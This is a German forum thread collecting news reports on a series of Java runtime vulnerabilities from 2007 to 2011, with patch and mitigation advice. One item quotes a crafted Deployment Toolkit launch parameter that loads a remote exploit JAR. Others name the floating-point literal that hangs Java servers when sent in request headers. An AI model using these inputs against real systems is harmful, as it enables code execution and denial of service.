Thema: Java ...

[SiLæncer]

In der Java-Laufzeitumgebung (JRE) von Sun sowie in der zugehörigen Entwicklungsumgebung (JDK beziehungsweise SDK) wurden zwei wesentliche Sicherheitsmängel entdeckt. Laut einem Hersteller-Advisory handelt es sich um zwei Schwachstellen in den Bildverarbeitungsroutinen, durch die nicht vertrauenswürdige Java-Applets unter Umständen zum einen unerlaubten Zugriff auf Anwenderdateien erhalten und beliebige Programme ausführen und zum anderen die Java-VM zum Absturz bringen können (Denial-of-Service). Betroffen von beiden Problemen sind die neueste Java-Version 6 sowie alle Vorgängerversionen auf allen Betriebssystemplattformen.

In den Versionen 6 Update 1 und 5.0 Update 11 hat Sun beide Fehler behoben. Version 1.3.1_20 behebt lediglich das Denial-of-Service-Problem. Anwender einer 1.3er-Version sollten ohnehin auf eine neuere Version aktualisieren. Für die in Entwicklerkreisen aus Stabilitätsgründen noch weit verbreitete Java-Version 1.4 stehen indes noch Updates für beide Schwachstellen aus. In der derzeit aktuellen Version 1.4.2_14 sind beide Lücken noch offen. Möglicherweise enthalten auch andere Java-Implementierungen die Fehler, etwa von IBM und Blackdown, da sie auf Sun-Java basieren. Von deren Herstellern liegen noch keine Fehlermeldungen vor.

Siehe dazu auch:

    * Security Vulnerabilities in the Java Runtime Environment Image Parsing Code may Allow a Untrusted Applet to Elevate Privileges, Advisory von Sun
    * Suns JDK führt Code aus Bildern aus, Meldung auf heise Security

Quelle und Links : http://www.heise.de/security/news/meldung/90514

[SiLæncer]

Als Sun vergangene Woche Java 1.6 Update 2 veröffentlicht hat, war noch unklar, ob und welche Sicherheitslücken die neue Version geschlossen hat. Inzwischen haben Sicherheitsdienstleister und Sun erste Meldungen herausgegeben, in denen sie Informationen zu den behobenen Fehlern liefern.

Der Sicherheitsdienstleister eEye erörtert in einer Sicherheitsmeldung, dass Java Web Start (javaws.exe) beim Verarbeiten von präparierten JNLP-Dateien patzt. In der Folge tritt ein Pufferüberlauf auf und eingeschleuster Programmcode kann zur Ausführung gelangen. Das Java Network Launching Protocol (JNLP) beschreibt vom Server ausgelieferte XML-Dateien, die Informationen über eine Java-Anwendung wie Ablageort der JAR-Datei, Parameter für den Aufruf oder auch die Hauptklasse der Anwendung enthalten. Der Fehler beruht darauf, dass Web Start das codebase-Attribut einer JNLP-Datei in einen Puffer fester Größe kopiert, ohne vorher die Länge des Wertes zu prüfen.

In einer Fehlermeldung erläutert Sun, dass XSLT-Stylesheets in digitalen Signaturen von XML-Dateien nicht korrekt verarbeitet werden. In der Folge kann fremder Programmcode mit den Rechten der Anwendung zur Ausführung kommen, die die XML-Datei verarbeitet. Bei XSLT-Stylesheets handelt es sich um Regelwerke, nach denen XML-Daten in unterschiedliche Ausgabeformate umformatiert werden können. Der Fehler kann auf Suns Java System Application Server und Web Server zur kompletten Übernahme des Systems durch Angreifer führen. Betroffen sind Java 1.6 Update 1 und ältere Versionen.

Sun beschreibt in einem weiteren Fehlerbericht eine Denial-of-Service-Schwachstelle in Java. Die Java Secure Socket Extension (JSSE) verarbeitet SSL/TLS-Verbindungsaushandlungen nicht korrekt. Ein Server, der JSSE für SSL/TLS-Unterstützung nutzt und im Netz auf eingehende verschlüsselte Verbindungen lauscht, könnte durch manipulierte Anfragen komplett zum Stillstand kommen. Der Fehler betrifft die Java-Versionen 1.6 Update 1 und vorherige Fassungen, 5.0 Update 11 und frühere Versionen sowie Java 1.4.14 und ältere.

Java-Anwender sollten so bald wie möglich auf die aktuellen Versionen umsteigen. Sun stellt als aktuelle Versionen 1.6 Update 2, 1.5 Update 12 und 1.4.2 Update 15 zum Download bereit.

Siehe dazu auch:

    * Sun Java WebStart JNLP Stack Buffer Overflow Vulnerability, Sicherheitsmeldung von eEye
    * Java Runtime Environment Does Not Securely Process XSLT Stylesheets Contained in XML Signatures, Fehlermeldung von Sun
    * Java Secure Socket Extension Does Not Correctly Process SSL/TLS Handshake Requests Resulting in a Denial of Service (DoS) Condition, Fehlerbericht von Sun


Quelle und Links : http://www.heise.de/security/news/meldung/92537

[SiLæncer]

Sun hat in vier Fehlerberichten auf Schwachstellen und Sicherheitslücken im Java Runtime Environment (JRE) hingewiesen. Durch einen Fehler im Applet Caching kann ein "untrusted" Applet Netzwerkverbindungen nicht nur zu dem Server aufbauen, von dem es heruntergeladen wurde, sondern auch zu anderen Systemen beziehungsweise Servern. Normalerweise erlauben dies die Sicherheitsrichtlinien von Java nicht. Des Weiteren kann ein nicht vertrauenswürdiges Applet ein derart großes Fenster öffnen, dass Warnmeldungen des JRE überdeckt werden. Betrüger könnten damit versuchen, Anwendern bestimmte Inhalte als vertrauenswürdig vorzugaukeln.

Zudem soll ein bösartiges Applet per Drag & Drop Zugriff auf ein System erhalten können. Dazu muss es allerdings nach Darstellung von Sun einen Anwender überzeugen, Dateien aus dem Applet-Fenster auf eine Anwendung zu ziehen, die Schreibrechte auf dem System besitzt.

Die genannten drei Schwachstellen finden sich in JDK und JRE 6 Update 2 und frühere, JDK und JRE 5.0 Update 12 und frühere, SDK und JRE 1.4.2_15 und vorhergehende, sowie SDK und JRE 1.3.1_20 und frühere. Die Fehler sind ab JDK und JRE 6 Update 3, JDK und JRE 5.0 Update 13 und SDK und JRE 1.4.2_16 behoben. Für SDK und JRE 1.3.1 soll die Version 1.3.1_21 demnächst erscheinen.

Darüber hinaus berichtet Sun von drei Lücken in Java Web Start, durch die ein Applet Zugriff auf lokale Dateien und Anwendungen erhält. Alle drei Fehler sind in den oben genannten Versionen zu finden, allerdings nicht jeder Fehler in jeder Version. Einzig SDK und JRE 1.3.1 sind nicht verwundbar – dort gibt es noch kein Web Start. Die Lücken sind ebenfalls in den aktuellen Java-Fassungen behoben. Zu beachten ist, dass Java-Updates in der Regel eine vollständig neue Version installieren, ohne die vorherige zu löschen. Anwender müssen die alten verwundbaren Versionen also per Hand deinstallieren.

Siehe dazu auch:

    * Security Vulnerability in Java Runtime Environment With Applet Caching May Allow Network Access Restrictions to be Circumvented, Fehlerbericht von Sun
    * Java Runtime Environment (JRE) May Allow Untrusted Applets or Applications to Display An Oversized Window so that the Warning Banner is Not Visible to User, Fehlerbericht von Sun
    * Multiple Security Vulnerabilities in Java Web Start Relating to Local File Access, Fehlerbericht von Sun
    * An Untrusted Java Web Start Application or Java Applet May Move or Copy Arbitrary Files by Requesting the User to Drag and Drop a File from Application or Applet Window to a Desktop Application, Fehlerbericht von Sun


Quelle und Links : http://www.heise.de/newsticker/meldung/96935

[SiLæncer]

Sun hat das Update 4 für Java 6 veröffentlicht, das rund 370 Fehler beheben soll. Einige davon sind auch sicherheitsrelevant. Zwar veröffentlicht Sun Details zu Lücken in Java in der Regel erst Monate später, im Changelog wird aber immerhin ein Stack Overflow in der Klasse sun.font.TrueTypeFont.getTableBuffer erwähnt.

Des Weiteren wurden mehrere Fehler behoben, die zu Abstürzen führen können. Unklar ist allerdings, ob sich damit auch etwa ein auf Java basierender Server aus der Ferne beeinträchtigen lässt. Anwender sollten die neue Version möglichst bald installieren.

Quelle : www.heise.de

[SiLæncer]

Sun warnt vor eine Sicherheitslücke in der Java-Laufzeitumgebung JRE. Aufgrund eines Fehlers in unpack200, dem Entpacker für Java-Archive, können Angreifer mit Hilfe manipulierter JAR-Dateien beliebigen Schadcode auf Anwender-Rechner schleusen und im Kontext des Nutzers ausführen lassen. Dies kann unter Umständen bereits beim Aufruf einer manipulierten Webseite geschehen.

Der Fehler befindet sich in Java JDK und JRE Version 5.0 Update 17 und 6 Update 12 sowie den Vorgängerversionen der beiden Serien auf Windows, Linux und Solaris. Der Hersteller weist allerdings ausdrücklich darauf hin, dass die Versionen 1.4.2 und 1.3.1 nicht betroffen sind.

Die installierte Java-Version lässt sich mit dem Kommandozeilenbefehl java -version abfragen. Unter Firefox liefert die Eingabe von about:config in die Adresszeile die Information; IE-Nutzer können eine spezielle Hersteller-Webseite aufrufen. Betroffene Anwender sollten möglichst bald auf die fehlerbereinigten Versionen 5 Update 18, 6 Update 13 oder eine Folgeversion aktualisieren.

Siehe dazu auch:

    * Integer and Buffer Overflow Vulnerabilities in the Java Runtime Environment (JRE) "unpack200" JAR Unpacking Utility May Lead to Escalation of Privileges, Advisory von Sun

Quelle : http://www.heise.de/newsticker/Sicherheitsluecke-in-Suns-Java-Umgebung--/meldung/135213

[SiLæncer]

Sun hat Java 6 Update 17 veröffentlicht, das unter anderem mehrere Sicherheitslücken schließt. Dazu gehören diverse von präparierten Audio- und Bilddateien provozierte Buffer und Integer Overflows, durch die ein Java-Applet oder eine "Java Web Start"-Anwendungen an höhere Zugriffsrecht auf einem System erlangen kann und so etwa das System infizieren kann. Durch einen Fehler im "Java Web Start"-Installer kann es passieren, dass eine nicht vertrauenswürdige Web-Start-Anwendung trotzdem als vertrauenswürdig startet und somit höheren Rechte als erlaubt erhält. Eine Schwachstelle im Java Runtime Environment Deployment Toolkit führt dazu, dass eine Webseite Code in ein System schleusen und starten kann.

Darüber hinaus hat Sun eine Schwachstelle beim Verifizieren vom HMAC-Digests entfernt, durch die sich etwa digitale Signaturen fälschen ließen. Des Weiteren soll die JRE-Update-Funktion künftig die Laufzeitumgebung auch dann aktualisieren, wenn es sich bei der Windows-Version nicht um eine enligschsprachige Version handelt.

Einige der Fehler sind auch in der Java-Versionen 5.0, 1.4.x und 1.3.x zu finden. Sun empfiehlt dort das Update auf die Versionen 5.0 Update 22 , 1.4.2_24 beziehungsweise 1.3.1_27. Alle drei haben aber den End of Life (EOL) bereits erreicht beziehungsweise überschritten. Für Version 5 ist Update 22 die letzte Aktualisierung. Sun empfiehlt daher allen Anwendern, auf Version 6 zu wechseln, um auch weiterhin Sicherheits-Updates zu erhalten.

Quelle : www.heise.de

[SiLæncer]

Tavis Ormandy hat eine Sicherheitslücke im Java Deployment Toolkit (JDT) unter Windows aufgedeckt, durch die präparierte Webseiten beliebige Anwendungen auf einem Windows-PC starten können. Möglich wäre beispielsweise, per FTP einen Trojaner nachzuladen und zu starten. JDT ist seit Java 6 Update 10 im Lieferumfang von Java enthalten und soll Entwicklern das Verteilen von Anwendungen erleichtern. Laut Ormandy beruht das Problem auf der ungenügenden Filterung von URLs, durch die sich beliebige Parameter an das zugrunde liegende Java Web Start (JWS) übergeben lassen. JWS selbst kann über das Java Network Launching Protocol (JNLP) externe Java-Anwendungen nachladen und in der VM ausführen.

Durch die Übergabe präparierter URLs an die Funktion launch (etwa http: -J-jar -J\\\\www.example.com\\exploit.jar none) lässt sich aber weiterer Java-Code nachladen und die Java-VM dazu bringen, darüber lokale Anwendungen mit den Rechten des Anwenders zu starten. Ormandy hat einen Demo-Exploit veröffentlicht, der die Datei calc.jar nachlädt, die wiederum über die Kommandozeile den Taschenrechner startet.

Bei einem kurzen Test der heise-Security-Redaktion öffnete sich unter Windows XP mit Java 6 Update 18 und dem Internet Explorer 8 nach kurzer Zeit der Taschenrechner. Unter Windows 7 produzierte die Java-VM unter Internet Explorer 8 nur eine Fehlermeldung. Der Exploit soll unter Windows auch mit dem Firefox-Browser funktionieren; im Test tat er es jedoch nicht.

Ormandy hat Sun (jetzt Oracle) nach eigenen Angaben über das Problem informiert. Laut seinem Bericht fand der Hersteller die Schwachstelle jedoch nicht kritisch genug, um einen Notfall-Patch außerhalb des dreimonatigen Patch-Zyklus zu veröffentlichen. Ormandy empfiehlt, bis zum Erscheinen eines Updates, für den Internet Explorer das Killbit für das ActiveX-Control des JDT zu setzen. Dies kann man entweder wie von Microsoft beschrieben per Hand tun, oder etwas komfortabler mit dem Tool AxBan. Die CLSID des betroffenen Controls lautet CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. Beim Firefox soll es helfen, über das Setzen restriktiver Rechte den Zugriff auf die Datei npdeploytk.dll zu verhindern.

Quelle : www.heise.de

[SiLæncer]

Erste Webseiten versuchen die seit Ende der vorigen Woche bekannte Lücke in Java Web Start auszunutzen, um die Windows-PCs von Besuchern zu infizieren, berichtet der Antivirenhersteller AVG in seinem Blog. Zu den Seiten soll unter anderem die populäre Plattform songlyrics.com gehören, auf der sich die Texte aktueller Lieder herunterladen lassen. Offenbar haben Kriminelle die Webseite gehackt und Code eingebettet, der den Schadcode von einem russischen Webserver nachlädt.

Die Lücke beruht auf der ungenügenden Filterung von URLs, durch die sich mit präparierten URLs Parameter an Java Web Start übergeben lassen, mit denen lokale Anwendungen gestartet werden können. Auf diese Weise lässt sich auch Code aus dem Netz nachladen und starten.Von der Lücke ist nicht nur Windows, sondern auch Unix betroffen. Java für Mac OS X soll nicht verwundbar sein.

Analysen des Dienstes Wepawet (Details zu Wepawet im heisec-Artikel "Malware auf der Spur") zufolge versuchen die Angreifer aber nicht nur die Java-Lücke auszunutzen, sondern darüber hinaus auch noch mehrere Schwachstellen im Adobe Reader. Adobe hat erst gestern mit dem Update 9.3.2 15 Lücken im Reader geschlossen.

Aber auch für Java gibt es eine Lösung: Oracle hat das Update 20 für Java 6 veröffentlicht, das offenbar das Problem löst. Zumindest funktionierte nach der Installation der neuen Version der öffentliche Exploit von Tavis Ormandy mit dem Internet Explorer und Firefox nicht mehr. Damit hat Oracle überraschend schnell reagiert. Noch am Freitag berichtete Ormandy, dass der Hersteller die Schwachstelle nicht kritisch genug fand, um einen Notfall-Patch außerhalb des dreimonatigen Patch-Zyklus zu veröffentlichen. Zwar hatte Oracle gestern seinen vierteljährlichen Critical Patch Update, darin wurde Java aber nicht erwähnt.

Oracle macht in den Release Notes zu Java 6 Update 20 keine konkreten Angaben, was genau gepatcht wurde. Auf den ersten Blick sieht es eher so aus, als würden die verwundbaren Komponenten gar nicht erst im Browser geladen, als dass die eigentliche Lücke wirklich geschlossen wurde.

Quelle : www.heise.de

[SiLæncer]

Das Java-Update führt offenbar nicht in allen Fällen dazu, dass der bekannte Exploit nicht mehr funktioniert. Die Ursache ist derzeit unklar. Alternativ hilft es weiterhin, beim Internet Explorer das Killbit für das verantwortliche ActiveX-Control zu setzen, beispielsweise indem man folgenden Text in der Datei kill.reg speichert und die Datei dann doppelklickt:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}]
"Compatibility Flags"=dword:00000400

Im Firefox genügt es unter Extras/Add-ons/Plugins alle Module für das Java Deployment Toolkit zu deaktivieren.

Quelle : www.heise.de

[SiLæncer]

Nach Beobachtungen des Microsoft Malware Protection Center (MMPC) hat die Zahl der Angriffsversuche auf Java-Lücken in den vergangenen Monaten dramatisch zugenommen. Laut Holly Stewart von MMPC wurden seit Mitte des Jahres rund sechs Millionen Angriffe auf drei ältere Java-Lücken registriert. Die Zahl der Angriffe auf den in der Kategorie "häufigste angegriffene Anwendung" ehemals führenden Adobe Reader wurde damit um ein Vielfaches übertroffen.

Stewart spekuliert, dass der Einbruchsversuch über Java für Kriminelle erfolgversprechender sei, weil es wie Adobes Software nahezu überall installiert, für den Anwender aber weniger präsent ist. Anwender würden Java somit vermutlich seltener updaten – eine der ausgenutzten Lücken ist zwei Jahre alt.

Möglicherweise tragen auch Adobes Bestrebungen, den Reader sicherer zu machen, erste Früchte. Der Hersteller hatte unter anderem die Funktion für das automatische Update verbessert. Kriminellen könnten deshalb auf Java ausweichen. Dafür sprechen die Beobachtungen von Brian Krebs, der ermittelte, dass in einer Vielzahl käuflicher Angriffstools für Kriminelle Java-Exploits enthalten sind.

Oracle hatte erst vergangene Woche im Rahmen seines Oktober-Patchdays Updates für Java veröffentlicht, die insgesamt 29 Lücken verteilt über die Versionen 6.0, 5.0 und 1.4.2 für alle unterstützten Plattformen schlossen. 15 der Lücken stufte Oracle als kritisch ein.

Quelle : www.heise.de

[SiLæncer]

Durch einen Fehler beim Konvertieren einer Gleitkommazahl kann ein Denial of Service in Java ausgelöst werden. Der Floating-Point-Bug war zuvor auch in PHP möglich.

Durch die fehlerhafte Verarbeitung der 64-Bit-Gleitkommazahl 2.2250738585072011e-308 ist es in Java möglich, einen Denial of Service (DoS) zu provozieren. Der Fehler wurde vom Studenten Konstantin Preißer entdeckt. Schuld daran ist die Konvertierung der Gleitkommazahl. Betroffen sind auch die 64-Bit-Varianten.

Zuvor wurde bekannt, dass PHP von dem Floating-Point Bug betroffen ist. Hier konnte die Gleitkommazahl ebenfalls einen Denial of Service auslösen, was jedoch zügig gepatcht wurde. Das Problem geht auf einen bekannten Fehler in Intels x87-Design zurück. Demnach tritt das Problem bei Prozessoren mit einer x87 FPU (Floating Point Unit) auf, wenn nicht explizit die Verwendung von SSE oder Float-Store erzwungen wird.

Laut einem Kommentar von Preißer auf Exploitbinary.com hatte er den Fehler schon vor drei Wochen an Oracle gemeldet - allerdings ohne eine Reaktion des Konzerns darauf.

Rekonstruieren lässt sich der Fehler sowohl im Compiler des aktuellen JDK als auch in Java-Programmen. Durch das Konvertieren der Gleitkommazahl mit Double.parseDouble tritt im Java-Paket FloatingDecimalJava.java eine Schleife auf, schreibt Preißler. Ein Patch von Oracle steht bislang aus.

Quelle : www.golem.de

[SiLæncer]

Der Sicherheitsspezialist Sami Koivu hat eine Sicherheitslücke in Java dokumentiert , über die er Sun bereits 2008 informiert hatte. Ein Test von heise Security bestätigt seine Angabe, dass sie immer noch offen ist.

Die Lücke betrifft den Dateiauswahl-Dialog JFileChooser; durch diese Komponente kann ein Java-Applet ohne Mitwirkung des Anwenders Dateien umbenennen. Eine leicht modifizierte Version des bereitgestellten Demo-Applets verschob mit der aktuellen Java-Version 1.6.0_23 einen Link vom Desktop in einen anderen Ordner. Mit etwas Raffinesse ließe sich durch diesen Zugriff auf das lokale Dateisystem, der unsignierten Applets eigentlich verwehrt sein sollte, deutlich schlimmeres anrichten.

Der eigentliche Skandal ist, dass Koivu den damaligen Java-Eigentümer Sun Microsystems bereits 2008 über dieses Problem informiert hat. In seinem Blog-Eintrag dokumentiert er seinen ursprünglichen Bug-Report, eine Antwort von Sun und seine Erwiderung darauf. Dieser Vorfall ist umso schwerwiegender, als Lücken in Java mittlerweile routinemäßig ausgenutzt werden, um PCs mit Schad-Software zu infizieren. Nach Beobachtungen des Microsoft Malware Protection Center war Java letztes Jahr das häufigste Angriffsziel für bösartige Web-Seiten. Man darf gespannt sein, wie lange Suns Nachfolger Oracle jetzt braucht, um einen Patch bereitzustellen.

Quelle : www.heise.de

[SiLæncer]

Erst ist PHP darüber gestolpert, nun kommt Java ins Straucheln: Die Umwandlung des Literals "2.2250738585072012e-308" in eine Gleitkommazahl führt zu einer Endlosschleife in Java, in dessen Folge die CPU voll ausgelastet wird. Insbesondere Server-Systeme laufen damit Gefahr, aus der Ferne abgeschossen zu werden. Dazu genügt es beispielsweise, in HTTP-Request-Headern das Literal als Parameter q mitzusenden.

Oracle soll über das Problem zwar bereits seit einigen Wochen informiert sein, hat jedoch erst jetzt eine Warnung veröffentlicht. Betroffen sind Java SE und Java for Business in aktuellen und vorhergehenden Version von JDK/JRE 6, 5 und 1.4. Ein Hotfix des Herstellers soll das Problem lösen, er empfiehlt es möglichst bald zu installiere, da die Informationen zum Ausnutzen der DoS-Schwachstelle bereits frei verfügbar sind. Für den 15. Februar plant der Hersteller zudem ein reguläres Update von Java.

Quelle : www.heise.de

[SiLæncer]

Oracle hat einen außerplanmäßigen Patch für eine inzwischen zehn Jahre alte Schwachstelle in der Entwicklungsumgebung für Java zum Download freigegeben. Angreifer konnten diese Lücke für Denial-of-Service-Attacken nutzen.

Den Angaben der Entwickler zufolge war ein solche Angriff unter Umständen ohne Benutzernamen oder Passwort möglich. Gefunden wurde die besagte Schwachstelle in mehreren Versionen der Entwicklungsumgebung, heißt es in der veröffentlichten 'Sicherheitsmeldung'.

Angeblich trat der zugrundeliegende Fehler auf, wenn der Wert "2.2250738585072012e-308" in eine binäre Gleitkommazahl konvertiert wurde. Dies hatte in vielen Fällen einen Absturz der Java-Laufzeitumgebung zur Folge.Folglich waren in erster Linie javabasierte Anwendungen und Server unter Linux, Solaris und Windows anfällig für Attacken.Erstmals gemeldet wurde der Bug in Foren für Java-Entwickler im Jahr 2001. Im November 2009 machte sodann ein weiterer Entwickler auf diese Problematik, welche von Oracle als mittelschwer eingestuft wird, aufmerksam.

Quelle : http://winfuture.de

[SiLæncer]

Das jetzt erhältliche Update 24 von Java 6 behebt den kürzlich bekannt gegebenen Floating-Point-Bug. Bei diesem führte die Umwandlung des Literals "2.2250738585072012e-308" in eine Gleitkommazahl zu einer Endlosschleife in Java, mit der Folge, dass die CPU voll ausgelastet wird. Oracle war über den Fehler offenbar schon länger informiert und hatte in der Folge, dass zahlreiche Medien auf die Lücke hingewiesen hatten, letzte Woche einen Hotfix bereitgestellt, den es zu installieren empfahl, da die Informationen zum Ausnutzen der Schwachstelle frei verfügbar waren.

Beeinträchtigt durch die Lücke, von der zuvor auch die PHP-Skriptsprache betroffen war, waren die Java Standard Edition (Java SE) und Java for Business in aktuellen sowie vorigen Versionen des Java Development Kit (JDK) und der Java Runtime Environment (JRE) 6, 5 respektive 1.4. Im Rahmen der Veröffentlichung des neuen Updates hat Oracle auch die interne Datenbank auf die neue Version (Java DB 10.6.2.1) aktualisiert.

Quelle : www.heise.de